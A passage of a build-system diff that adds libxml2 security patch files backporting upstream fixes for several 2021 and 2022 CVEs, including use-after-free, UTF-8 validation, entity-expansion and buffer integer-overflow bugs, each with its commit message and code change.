+-			if (end != NULL) {
+-			    *start = '\0';
+-			}
+-		    }
+-
+-		    /* Escape the whole string, or until start (set to '\0'). */
+-		    escaped = xmlURIEscapeStr(tmp, BAD_CAST"@/:=?;#%&,+");
+-		    if (escaped != NULL) {
+-		        xmlBufCat(buf->buffer, escaped);
+-		        xmlFree(escaped);
+-		    } else {
+-		        xmlBufCat(buf->buffer, tmp);
+-		    }
+-
+-		    if (end == NULL) { /* Everything has been written. */
+-			break;
+-		    }
+-
+-		    /* Do not escape anything within server side includes. */
+-		    *start = '<'; /* Restore the first character of "<!--". */
+-		    end += 3; /* strlen("-->") */
+-		    endChar = *end;
+-		    *end = '\0';
+-		    xmlBufCat(buf->buffer, start);
+-		    *end = endChar;
+-		    tmp = end;
++		/*
++		 * the < and > have already been escaped at the entity level
++		 * And doing so here breaks server side includes
++		 */
++		escaped = xmlURIEscapeStr(tmp, BAD_CAST"@/:=?;#%&,+<>");
++		if (escaped != NULL) {
++		    xmlBufWriteQuotedString(buf->buffer, escaped);
++		    xmlFree(escaped);
++		} else {
++		    xmlBufWriteQuotedString(buf->buffer, value);
+ 		}
+-
+-		xmlBufCCat(buf->buffer, "\"");
+ 	    } else {
+ 		xmlBufWriteQuotedString(buf->buffer, value);
+ 	    }
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2021-3516.patch b/meta/recipes-core/libxml/libxml2/CVE-2021-3516.patch
new file mode 100644
index 0000000000..200f42091e
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2021-3516.patch
@@ -0,0 +1,35 @@
+From 1358d157d0bd83be1dfe356a69213df9fac0b539 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Wed, 21 Apr 2021 13:23:27 +0200
+Subject: [PATCH] Fix use-after-free with `xmllint --html --push`
+
+Call htmlCtxtUseOptions to make sure that names aren't stored in
+dictionaries.
+
+Note that this issue only affects xmllint using the HTML push parser.
+
+Fixes #230.
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/1358d157d0bd83be1dfe356a69213df9fac0b539]
+CVE: CVE-2021-3516
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ xmllint.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/xmllint.c b/xmllint.c
+index 6ca1bf54d..dbef273a8 100644
+--- a/xmllint.c
++++ b/xmllint.c
+@@ -2213,7 +2213,7 @@ static void parseAndPrintFile(char *filename, xmlParserCtxtPtr rectxt) {
+             if (res > 0) {
+                 ctxt = htmlCreatePushParserCtxt(NULL, NULL,
+                             chars, res, filename, XML_CHAR_ENCODING_NONE);
+-                xmlCtxtUseOptions(ctxt, options);
++                htmlCtxtUseOptions(ctxt, options);
+                 while ((res = fread(chars, 1, pushsize, f)) > 0) {
+                     htmlParseChunk(ctxt, chars, res, 0);
+                 }
+-- 
+GitLab
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2021-3517.patch b/meta/recipes-core/libxml/libxml2/CVE-2021-3517.patch
new file mode 100644
index 0000000000..e88a8ae7c6
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2021-3517.patch
@@ -0,0 +1,53 @@
+From bf22713507fe1fc3a2c4b525cf0a88c2dc87a3a2 Mon Sep 17 00:00:00 2001
+From: Joel Hockey <joel.hockey@gmail.com>
+Date: Sun, 16 Aug 2020 17:19:35 -0700
+Subject: [PATCH] Validate UTF8 in xmlEncodeEntities
+
+Code is currently assuming UTF-8 without validating. Truncated UTF-8
+input can cause out-of-bounds array access.
+
+Adds further checks to partial fix in 50f06b3e.
+
+Fixes #178
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/bf22713507fe1fc3a2c4b525cf0a88c2dc87a3a2]
+CVE: CVE-2021-3517
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ entities.c | 16 +++++++++++++++-
+ 1 file changed, 15 insertions(+), 1 deletion(-)
+
+diff --git a/entities.c b/entities.c
+index 37b99a56..1a8f86f0 100644
+--- a/entities.c
++++ b/entities.c
+@@ -704,11 +704,25 @@ xmlEncodeEntitiesInternal(xmlDocPtr doc, const xmlChar *input, int attr) {
+ 	    } else {
+ 		/*
+ 		 * We assume we have UTF-8 input.
++		 * It must match either:
++		 *   110xxxxx 10xxxxxx
++		 *   1110xxxx 10xxxxxx 10xxxxxx
++		 *   11110xxx 10xxxxxx 10xxxxxx 10xxxxxx
++		 * That is:
++		 *   cur[0] is 11xxxxxx
++		 *   cur[1] is 10xxxxxx
++		 *   cur[2] is 10xxxxxx if cur[0] is 111xxxxx
++		 *   cur[3] is 10xxxxxx if cur[0] is 1111xxxx
++		 *   cur[0] is not 11111xxx
+ 		 */
+ 		char buf[11], *ptr;
+ 		int val = 0, l = 1;
+ 
+-		if (*cur < 0xC0) {
++		if (((cur[0] & 0xC0) != 0xC0) ||
++		    ((cur[1] & 0xC0) != 0x80) ||
++		    (((cur[0] & 0xE0) == 0xE0) && ((cur[2] & 0xC0) != 0x80)) ||
++		    (((cur[0] & 0xF0) == 0xF0) && ((cur[3] & 0xC0) != 0x80)) ||
++		    (((cur[0] & 0xF8) == 0xF8))) {
+ 		    xmlEntitiesErr(XML_CHECK_NOT_UTF8,
+ 			    "xmlEncodeEntities: input not UTF-8");
+ 		    if (doc != NULL)
+-- 
+GitLab
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2021-3518.patch b/meta/recipes-core/libxml/libxml2/CVE-2021-3518.patch
new file mode 100644
index 0000000000..40d3debea1
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2021-3518.patch
@@ -0,0 +1,112 @@
+From ac82a514e16eb81b4506e2cba1a1ee45b9f025b5 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Wed, 10 Jun 2020 16:34:52 +0200
+Subject: [PATCH 1/2] Don't recurse into xi:include children in
+ xmlXIncludeDoProcess
+
+Otherwise, nested xi:include nodes might result in a use-after-free
+if XML_PARSE_NOXINCNODE is specified.
+
+Found with libFuzzer and ASan.
+
+Upstream-Status: Backport [from fedora: https://bugzilla.redhat.com/show_bug.cgi?id=1954243]
+
+The upstream patch 752e5f71d7cea2ca5a7e7c0b8f72ed04ce654be4 has been modified,
+as to avoid unnecessary modifications to fallback files.
+
+CVE: CVE-2021-3518
+Signed-off-by: Jasper Orschulko <Jasper.Orschulko@iris-sensing.com>
+---
+ xinclude.c | 24 ++++++++++--------------
+ 1 file changed, 10 insertions(+), 14 deletions(-)
+
+diff --git a/xinclude.c b/xinclude.c
+index ba850fa5..f260c1a7 100644
+--- a/xinclude.c
++++ b/xinclude.c
+@@ -2392,21 +2392,19 @@ xmlXIncludeDoProcess(xmlXIncludeCtxtPtr ctxt, xmlDocPtr doc, xmlNodePtr tree) {
+      * First phase: lookup the elements in the document
+      */
+     cur = tree;
+-    if (xmlXIncludeTestNode(ctxt, cur) == 1)
+-	xmlXIncludePreProcessNode(ctxt, cur);
+     while ((cur != NULL) && (cur != tree->parent)) {
+ 	/* TODO: need to work on entities -> stack */
+-	if ((cur->children != NULL) &&
+-	    (cur->children->type != XML_ENTITY_DECL) &&
+-	    (cur->children->type != XML_XINCLUDE_START) &&
+-	    (cur->children->type != XML_XINCLUDE_END)) {
+-	    cur = cur->children;
+-	    if (xmlXIncludeTestNode(ctxt, cur))
+-		xmlXIncludePreProcessNode(ctxt, cur);
+-	} else if (cur->next != NULL) {
++        if (xmlXIncludeTestNode(ctxt, cur) == 1) {
++            xmlXIncludePreProcessNode(ctxt, cur);
++        } else if ((cur->children != NULL) &&
++                   (cur->children->type != XML_ENTITY_DECL) &&
++                   (cur->children->type != XML_XINCLUDE_START) &&
++                   (cur->children->type != XML_XINCLUDE_END)) {
++            cur = cur->children;
++            continue;
++        }
++	if (cur->next != NULL) {
+ 	    cur = cur->next;
+-	    if (xmlXIncludeTestNode(ctxt, cur))
+-		xmlXIncludePreProcessNode(ctxt, cur);
+ 	} else {
+ 	    if (cur == tree)
+ 	        break;
+@@ -2416,8 +2414,6 @@ xmlXIncludeDoProcess(xmlXIncludeCtxtPtr ctxt, xmlDocPtr doc, xmlNodePtr tree) {
+ 		    break; /* do */
+ 		if (cur->next != NULL) {
+ 		    cur = cur->next;
+-		    if (xmlXIncludeTestNode(ctxt, cur))
+-			xmlXIncludePreProcessNode(ctxt, cur);
+ 		    break; /* do */
+ 		}
+ 	    } while (cur != NULL);
+-- 
+2.32.0
+
+
+From 3ad5ac1e39e3cd42f838c1cd27ffd4e9b79e6121 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Thu, 22 Apr 2021 19:26:28 +0200
+Subject: [PATCH 2/2] Fix user-after-free with `xmllint --xinclude --dropdtd`
+
+The --dropdtd option can leave dangling pointers in entity reference
+nodes. Make sure to skip these nodes when processing XIncludes.
+
+This also avoids scanning entity declarations and even modifying
+them inadvertently during XInclude processing.
+
+Move from a block list to an allow list approach to avoid descending
+into other node types that can't contain elements.
+
+Fixes #237.
+Upstream-Status: Backport
+CVE: CVE-2021-3518
+Signed-off-by: Jasper Orschulko <Jasper.Orschulko@iris-sensing.com>
+---
+ xinclude.c | 5 ++---
+ 1 file changed, 2 insertions(+), 3 deletions(-)
+
+diff --git a/xinclude.c b/xinclude.c
+index f260c1a7..d7648529 100644
+--- a/xinclude.c
++++ b/xinclude.c
+@@ -2397,9 +2397,8 @@ xmlXIncludeDoProcess(xmlXIncludeCtxtPtr ctxt, xmlDocPtr doc, xmlNodePtr tree) {
+         if (xmlXIncludeTestNode(ctxt, cur) == 1) {
+             xmlXIncludePreProcessNode(ctxt, cur);
+         } else if ((cur->children != NULL) &&
+-                   (cur->children->type != XML_ENTITY_DECL) &&
+-                   (cur->children->type != XML_XINCLUDE_START) &&
+-                   (cur->children->type != XML_XINCLUDE_END)) {
++                   ((cur->type == XML_DOCUMENT_NODE) ||
++                    (cur->type == XML_ELEMENT_NODE))) {
+             cur = cur->children;
+             continue;
+         }
+-- 
+2.32.0
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2021-3537.patch b/meta/recipes-core/libxml/libxml2/CVE-2021-3537.patch
new file mode 100644
index 0000000000..9e64c2a36d
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2021-3537.patch
@@ -0,0 +1,50 @@
+From babe75030c7f64a37826bb3342317134568bef61 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Sat, 1 May 2021 16:53:33 +0200
+Subject: [PATCH] Propagate error in xmlParseElementChildrenContentDeclPriv
+
+Check return value of recursive calls to
+xmlParseElementChildrenContentDeclPriv and return immediately in case
+of errors. Otherwise, struct xmlElementContent could contain unexpected
+null pointers, leading to a null deref when post-validating documents
+which aren't well-formed and parsed in recovery mode.
+
+Fixes #243.
+
+Upstream-Status: Backport
+[https://gitlab.gnome.org/GNOME/libxml2/-/commit/babe75030c7f64a37826bb3342317134568bef61]
+CVE: CVE-2021-3537
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ parser.c | 7 +++++++
+ 1 file changed, 7 insertions(+)
+
+diff --git a/parser.c b/parser.c
+index b42e6043..73c27edd 100644
+--- a/parser.c
++++ b/parser.c
+@@ -6208,6 +6208,8 @@ xmlParseElementChildrenContentDeclPriv(xmlParserCtxtPtr ctxt, int inputchk,
+ 	SKIP_BLANKS;
+         cur = ret = xmlParseElementChildrenContentDeclPriv(ctxt, inputid,
+                                                            depth + 1);
++        if (cur == NULL)
++            return(NULL);
+ 	SKIP_BLANKS;
+ 	GROW;
+     } else {
+@@ -6341,6 +6343,11 @@ xmlParseElementChildrenContentDeclPriv(xmlParserCtxtPtr ctxt, int inputchk,
+ 	    SKIP_BLANKS;
+ 	    last = xmlParseElementChildrenContentDeclPriv(ctxt, inputid,
+                                                           depth + 1);
++            if (last == NULL) {
++		if (ret != NULL)
++		    xmlFreeDocElementContent(ctxt->myDoc, ret);
++		return(NULL);
++            }
+ 	    SKIP_BLANKS;
+ 	} else {
+ 	    elem = xmlParseName(ctxt);
+-- 
+GitLab
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2021-3541.patch b/meta/recipes-core/libxml/libxml2/CVE-2021-3541.patch
new file mode 100644
index 0000000000..1f392b4cd7
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2021-3541.patch
@@ -0,0 +1,73 @@
+From 8598060bacada41a0eb09d95c97744ff4e428f8e Mon Sep 17 00:00:00 2001
+From: Daniel Veillard <veillard@redhat.com>
+Date: Thu, 13 May 2021 14:55:12 +0200
+Subject: [PATCH] Patch for security issue CVE-2021-3541
+
+This is relapted to parameter entities expansion and following
+the line of the billion laugh attack. Somehow in that path the
+counting of parameters was missed and the normal algorithm based
+on entities "density" was useless.
+
+Upstream-Status: Backport
+[https://gitlab.gnome.org/GNOME/libxml2/-/commit/8598060bacada41a0eb09d95c97744ff4e428f8e]
+CVE: CVE-2021-3541
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ parser.c | 26 ++++++++++++++++++++++++++
+ 1 file changed, 26 insertions(+)
+
+diff --git a/parser.c b/parser.c
+index f5e5e169..c9312fa4 100644
+--- a/parser.c
++++ b/parser.c
+@@ -140,6 +140,7 @@ xmlParserEntityCheck(xmlParserCtxtPtr ctxt, size_t size,
+                      xmlEntityPtr ent, size_t replacement)
+ {
+     size_t consumed = 0;
++    int i;
+ 
+     if ((ctxt == NULL) || (ctxt->options & XML_PARSE_HUGE))
+         return (0);
+@@ -177,6 +178,28 @@ xmlParserEntityCheck(xmlParserCtxtPtr ctxt, size_t size,
+ 	    rep = NULL;
+ 	}
+     }
++
++    /*
++     * Prevent entity exponential check, not just replacement while
++     * parsing the DTD
++     * The check is potentially costly so do that only once in a thousand
++     */
++    if ((ctxt->instate == XML_PARSER_DTD) && (ctxt->nbentities > 10000) &&
++        (ctxt->nbentities % 1024 == 0)) {
++	for (i = 0;i < ctxt->inputNr;i++) {
++	    consumed += ctxt->inputTab[i]->consumed +
++	               (ctxt->inputTab[i]->cur - ctxt->inputTab[i]->base);
++	}
++	if (ctxt->nbentities > consumed * XML_PARSER_NON_LINEAR) {
++	    xmlFatalErr(ctxt, XML_ERR_ENTITY_LOOP, NULL);
++	    ctxt->instate = XML_PARSER_EOF;
++	    return (1);
++	}
++	consumed = 0;
++    }
++
++
++
+     if (replacement != 0) {
+ 	if (replacement < XML_MAX_TEXT_LENGTH)
+ 	    return(0);
+@@ -7963,6 +7986,9 @@ xmlParsePEReference(xmlParserCtxtPtr ctxt)
+             xmlChar start[4];
+             xmlCharEncoding enc;
+ 
++	    if (xmlParserEntityCheck(ctxt, 0, entity, 0))
++	        return;
++
+ 	    if ((entity->etype == XML_EXTERNAL_PARAMETER_ENTITY) &&
+ 	        ((ctxt->options & XML_PARSE_NOENT) == 0) &&
+ 		((ctxt->options & XML_PARSE_DTDVALID) == 0) &&
+-- 
+GitLab
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2022-23308-fix-regression.patch b/meta/recipes-core/libxml/libxml2/CVE-2022-23308-fix-regression.patch
new file mode 100644
index 0000000000..7fc243eec1
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2022-23308-fix-regression.patch
@@ -0,0 +1,98 @@
+From 646fe48d1c8a74310c409ddf81fe7df6700052af Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Tue, 22 Feb 2022 11:51:08 +0100
+Subject: [PATCH] Fix --without-valid build
+
+Regressed in commit 652dd12a.
+---
+ valid.c | 58 ++++++++++++++++++++++++++++-----------------------------
+ 1 file changed, 29 insertions(+), 29 deletions(-)
+---
+
+From https://github.com/GNOME/libxml2.git
+ commit 646fe48d1c8a74310c409ddf81fe7df6700052af
+
+CVE: CVE-2022-23308
+Upstream-Status: Backport
+
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+
+diff --git a/valid.c b/valid.c
+index 8e596f1d..9684683a 100644
+--- a/valid.c
++++ b/valid.c
+@@ -479,35 +479,6 @@ nodeVPop(xmlValidCtxtPtr ctxt)
+     return (ret);
+ }
+ 
+-/**
+- * xmlValidNormalizeString:
+- * @str: a string
+- *
+- * Normalize a string in-place.
+- */
+-static void
+-xmlValidNormalizeString(xmlChar *str) {
+-    xmlChar *dst;
+-    const xmlChar *src;
+-
+-    if (str == NULL)
+-        return;
+-    src = str;
+-    dst = str;
+-
+-    while (*src == 0x20) src++;
+-    while (*src != 0) {
+-	if (*src == 0x20) {
+-	    while (*src == 0x20) src++;
+-	    if (*src != 0)
+-		*dst++ = 0x20;
+-	} else {
+-	    *dst++ = *src++;
+-	}
+-    }
+-    *dst = 0;
+-}
+-
+ #ifdef DEBUG_VALID_ALGO
+ static void
+ xmlValidPrintNode(xmlNodePtr cur) {
+@@ -2636,6 +2607,35 @@ xmlDumpNotationTable(xmlBufferPtr buf, xmlNotationTablePtr table) {
+ 	    (xmlDictOwns(dict, (const xmlChar *)(str)) == 0)))	\
+ 	    xmlFree((char *)(str));
+ 
++/**
++ * xmlValidNormalizeString:
++ * @str: a string
++ *
++ * Normalize a string in-place.
++ */
++static void
++xmlValidNormalizeString(xmlChar *str) {
++    xmlChar *dst;
++    const xmlChar *src;
++
++    if (str == NULL)
++        return;
++    src = str;
++    dst = str;
++
++    while (*src == 0x20) src++;
++    while (*src != 0) {
++	if (*src == 0x20) {
++	    while (*src == 0x20) src++;
++	    if (*src != 0)
++		*dst++ = 0x20;
++	} else {
++	    *dst++ = *src++;
++	}
++    }
++    *dst = 0;
++}
++
+ static int
+ xmlIsStreaming(xmlValidCtxtPtr ctxt) {
+     xmlParserCtxtPtr pctxt;
+-- 
+2.35.1
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2022-23308.patch b/meta/recipes-core/libxml/libxml2/CVE-2022-23308.patch
new file mode 100644
index 0000000000..bf5604e81a
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2022-23308.patch
@@ -0,0 +1,204 @@
+From 8b66850de350f0fcd786ae776a65ba15a5999e50 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Tue, 8 Feb 2022 03:29:24 +0100
+Subject: [PATCH] Use-after-free of ID and IDREF attributes
+
+If a document is parsed with XML_PARSE_DTDVALID and without
+XML_PARSE_NOENT, the value of ID attributes has to be normalized after
+potentially expanding entities in xmlRemoveID. Otherwise, later calls
+to xmlGetID can return a pointer to previously freed memory.
+
+ID attributes which are empty or contain only whitespace after
+entity expansion are affected in a similar way. This is fixed by
+not storing such attributes in the ID table.
+
+The test to detect streaming mode when validating against a DTD was
+broken. In connection with the defects above, this could result in a
+use-after-free when using the xmlReader interface with validation.
+Fix detection of streaming mode to avoid similar issues. (This changes
+the expected result of a test case. But as far as I can tell, using the
+XML reader with XIncludes referencing the root document never worked
+properly, anyway.)
+
+All of these issues can result in denial of service. Using xmlReader
+with validation could result in disclosure of memory via the error
+channel, typically stderr. The security impact of xmlGetID returning
+a pointer to freed memory depends on the application. The typical use
+case of calling xmlGetID on an unmodified document is not affected.
+
+Upstream-Status: Backport
+[https://gitlab.gnome.org/GNOME/libxml2/-/commit/652dd12a858989b14eed4e84e453059cd3ba340e]
+
+The upstream patch 652dd12a858989b14eed4e84e453059cd3ba340e has been modified
+to skip the patch to the testsuite result (result/XInclude/ns1.xml.rdr), as
+this particular test does not exist in v2.9.10 (it was added later).
+
+CVE: CVE-2022-23308
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+
+---
+ valid.c | 88 +++++++++++++++++++++++++++++++++++----------------------
+ 1 file changed, 55 insertions(+), 33 deletions(-)
+
+diff --git a/valid.c b/valid.c
+index 07963e7..ee75311 100644
+--- a/valid.c
++++ b/valid.c
+@@ -479,6 +479,35 @@ nodeVPop(xmlValidCtxtPtr ctxt)
+     return (ret);
+ }
+ 
++/**
++ * xmlValidNormalizeString:
++ * @str: a string
++ *
++ * Normalize a string in-place.
++ */
++static void
++xmlValidNormalizeString(xmlChar *str) {
++    xmlChar *dst;
++    const xmlChar *src;
++
++    if (str == NULL)
++        return;
++    src = str;
++    dst = str;
++
++    while (*src == 0x20) src++;
++    while (*src != 0) {
++	if (*src == 0x20) {
++	    while (*src == 0x20) src++;
++	    if (*src != 0)
++		*dst++ = 0x20;
++	} else {
++	    *dst++ = *src++;
++	}
++    }
++    *dst = 0;
++}
++
+ #ifdef DEBUG_VALID_ALGO
+ static void
+ xmlValidPrintNode(xmlNodePtr cur) {
+@@ -2607,6 +2636,24 @@ xmlDumpNotationTable(xmlBufferPtr buf, xmlNotationTablePtr table) {
+ 	    (xmlDictOwns(dict, (const xmlChar *)(str)) == 0)))	\
+ 	    xmlFree((char *)(str));
+ 
++static int
++xmlIsStreaming(xmlValidCtxtPtr ctxt) {
++    xmlParserCtxtPtr pctxt;
++
++    if (ctxt == NULL)
++        return(0);
++    /*
++     * These magic values are also abused to detect whether we're validating
++     * while parsing a document. In this case, userData points to the parser
++     * context.
++     */
++    if ((ctxt->finishDtd != XML_CTXT_FINISH_DTD_0) &&
++        (ctxt->finishDtd != XML_CTXT_FINISH_DTD_1))
++        return(0);
++    pctxt = ctxt->userData;
++    return(pctxt->parseMode == XML_PARSE_READER);
++}
++
+ /**
+  * xmlFreeID:
+  * @not:  A id
+@@ -2650,7 +2697,7 @@ xmlAddID(xmlValidCtxtPtr ctxt, xmlDocPtr doc, const xmlChar *value,
+     if (doc == NULL) {
+ 	return(NULL);
+     }
+-    if (value == NULL) {
++    if ((value == NULL) || (value[0] == 0)) {
+ 	return(NULL);
+     }
+     if (attr == NULL) {
+@@ -2681,7 +2728,7 @@ xmlAddID(xmlValidCtxtPtr ctxt, xmlDocPtr doc, const xmlChar *value,
+      */
+     ret->value = xmlStrdup(value);
+     ret->doc = doc;
+-    if ((ctxt != NULL) && (ctxt->vstateNr != 0)) {
++    if (xmlIsStreaming(ctxt)) {
+ 	/*
+ 	 * Operating in streaming mode, attr is gonna disappear
+ 	 */
+@@ -2820,6 +2867,7 @@ xmlRemoveID(xmlDocPtr doc, xmlAttrPtr attr) {
+     ID = xmlNodeListGetString(doc, attr->children, 1);
+     if (ID == NULL)
+         return(-1);
++    xmlValidNormalizeString(ID);
+ 
+     id = xmlHashLookup(table, ID);
+     if (id == NULL || id->attr != attr) {
+@@ -3009,7 +3057,7 @@ xmlAddRef(xmlValidCtxtPtr ctxt, xmlDocPtr doc, const xmlChar *value,
+      * fill the structure.
+      */
+     ret->value = xmlStrdup(value);
+-    if ((ctxt != NULL) && (ctxt->vstateNr != 0)) {
++    if (xmlIsStreaming(ctxt)) {
+ 	/*
+ 	 * Operating in streaming mode, attr is gonna disappear
+ 	 */
+@@ -4028,8 +4076,7 @@ xmlValidateAttributeValue2(xmlValidCtxtPtr ctxt, xmlDocPtr doc,
+ xmlChar *
+ xmlValidCtxtNormalizeAttributeValue(xmlValidCtxtPtr ctxt, xmlDocPtr doc,
+ 	     xmlNodePtr elem, const xmlChar *name, const xmlChar *value) {
+-    xmlChar *ret, *dst;
+-    const xmlChar *src;
++    xmlChar *ret;
+     xmlAttributePtr attrDecl = NULL;
+     int extsubset = 0;
+ 
+@@ -4070,19 +4117,7 @@ xmlValidCtxtNormalizeAttributeValue(xmlValidCtxtPtr ctxt, xmlDocPtr doc,
+     ret = xmlStrdup(value);
+     if (ret == NULL)
+ 	return(NULL);
+-    src = value;
+-    dst = ret;
+-    while (*src == 0x20) src++;
+-    while (*src != 0) {
+-	if (*src == 0x20) {
+-	    while (*src == 0x20) src++;
+-	    if (*src != 0)
+-		*dst++ = 0x20;
+-	} else {
+-	    *dst++ = *src++;
+-	}
+-    }
+-    *dst = 0;
++    xmlValidNormalizeString(ret);
+     if ((doc->standalone) && (extsubset == 1) && (!xmlStrEqual(value, ret))) {
+ 	xmlErrValidNode(ctxt, elem, XML_DTD_NOT_STANDALONE,
+ "standalone: %s on %s value had to be normalized based on external subset declaration\n",
+@@ -4114,8 +4149,7 @@ xmlValidCtxtNormalizeAttributeValue(xmlValidCtxtPtr ctxt, xmlDocPtr doc,
+ xmlChar *
+ xmlValidNormalizeAttributeValue(xmlDocPtr doc, xmlNodePtr elem,
+ 			        const xmlChar *name, const xmlChar *value) {
+-    xmlChar *ret, *dst;
+-    const xmlChar *src;
++    xmlChar *ret;
+     xmlAttributePtr attrDecl = NULL;
+ 
+     if (doc == NULL) return(NULL);
+@@ -4145,19 +4179,7 @@ xmlValidNormalizeAttributeValue(xmlDocPtr doc, xmlNodePtr elem,
+     ret = xmlStrdup(value);
+     if (ret == NULL)
+ 	return(NULL);
+-    src = value;
+-    dst = ret;
+-    while (*src == 0x20) src++;
+-    while (*src != 0) {
+-	if (*src == 0x20) {
+-	    while (*src == 0x20) src++;
+-	    if (*src != 0)
+-		*dst++ = 0x20;
+-	} else {
+-	    *dst++ = *src++;
+-	}
+-    }
+-    *dst = 0;
++    xmlValidNormalizeString(ret);
+     return(ret);
+ }
+ 
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2022-29824-dependent.patch b/meta/recipes-core/libxml/libxml2/CVE-2022-29824-dependent.patch
new file mode 100644
index 0000000000..63d613cc21
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2022-29824-dependent.patch
@@ -0,0 +1,53 @@
+From b07251215ef48c70c6e56f7351406c47cfca4d5b Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Fri, 10 Jan 2020 15:55:07 +0100
+Subject: [PATCH] Fix integer overflow in xmlBufferResize
+
+Found by OSS-Fuzz.
+
+CVE: CVE-2022-29824
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/b07251215ef48c70c6e56f7351406c47cfca4d5b]
+
+Signed-off-by: Riyaz Ahmed Khan <Riyaz.Khan@kpit.com>
+
+---
+ tree.c | 9 +++++++--
+ 1 file changed, 7 insertions(+), 2 deletions(-)
+
+diff --git a/tree.c b/tree.c
+index 0d7fc98c..f43f6de1 100644
+--- a/tree.c
++++ b/tree.c
+@@ -7424,12 +7424,17 @@ xmlBufferResize(xmlBufferPtr buf, unsigned int size)
+     if (size < buf->size)
+         return 1;
+ 
++    if (size > UINT_MAX - 10) {
++        xmlTreeErrMemory("growing buffer");
++        return 0;
++    }
++
+     /* figure out new size */
+     switch (buf->alloc){
+ 	case XML_BUFFER_ALLOC_IO:
+ 	case XML_BUFFER_ALLOC_DOUBLEIT:
+ 	    /*take care of empty case*/
+-	    newSize = (buf->size ? buf->size*2 : size + 10);
++	    newSize = (buf->size ? buf->size : size + 10);
+ 	    while (size > newSize) {
+ 	        if (newSize > UINT_MAX / 2) {
+ 	            xmlTreeErrMemory("growing buffer");
+@@ -7445,7 +7450,7 @@ xmlBufferResize(xmlBufferPtr buf, unsigned int size)
+             if (buf->use < BASE_BUFFER_SIZE)
+                 newSize = size;
+             else {
+-                newSize = buf->size * 2;
++                newSize = buf->size;
+                 while (size > newSize) {
+                     if (newSize > UINT_MAX / 2) {
+                         xmlTreeErrMemory("growing buffer");
+-- 
+GitLab
+
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2022-29824.patch b/meta/recipes-core/libxml/libxml2/CVE-2022-29824.patch
new file mode 100644
index 0000000000..ad7b87dbc6
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2022-29824.patch
@@ -0,0 +1,348 @@
+From 2554a2408e09f13652049e5ffb0d26196b02ebab Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Tue, 8 Mar 2022 20:10:02 +0100
+Subject: [PATCH] [CVE-2022-29824] Fix integer overflows in xmlBuf and
+ xmlBuffer
+
+In several places, the code handling string buffers didn't check for
+integer overflow or used wrong types for buffer sizes. This could
+result in out-of-bounds writes or other memory errors when working on
+large, multi-gigabyte buffers.
+
+Thanks to Felix Wilhelm for the report.
+
+CVE: CVE-2022-29824
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/2554a2408e09f13652049e5ffb0d26196b02ebab]
+
+Signed-off-by: Riyaz Ahmed Khan <Riyaz.Khan@kpit.com>
+
+---
+ buf.c  | 86 +++++++++++++++++++++++-----------------------------------
+ tree.c | 72 ++++++++++++++++++------------------------------
+ 2 files changed, 61 insertions(+), 97 deletions(-)
+
+diff --git a/buf.c b/buf.c
+index 24368d37..40a5ee06 100644
+--- a/buf.c
++++ b/buf.c
+@@ -30,6 +30,10 @@
+ #include <libxml/parserInternals.h> /* for XML_MAX_TEXT_LENGTH */
+ #include "buf.h"
+ 
++#ifndef SIZE_MAX
++#define SIZE_MAX ((size_t) -1)
++#endif
++
+ #define WITH_BUFFER_COMPAT
+ 
+ /**
+@@ -156,6 +160,8 @@ xmlBufPtr
+ xmlBufCreateSize(size_t size) {
+     xmlBufPtr ret;
+ 
++    if (size == SIZE_MAX)
++        return(NULL);
+     ret = (xmlBufPtr) xmlMalloc(sizeof(xmlBuf));
+     if (ret == NULL) {
+ 	xmlBufMemoryError(NULL, "creating buffer");
+@@ -166,8 +172,8 @@ xmlBufCreateSize(size_t size) {
+     ret->error = 0;
+     ret->buffer = NULL;
+     ret->alloc = xmlBufferAllocScheme;
+-    ret->size = (size ? size+2 : 0);         /* +1 for ending null */
+-    ret->compat_size = (int) ret->size;
++    ret->size = (size ? size + 1 : 0);         /* +1 for ending null */
++    ret->compat_size = (ret->size > INT_MAX ? INT_MAX : ret->size);
+     if (ret->size){
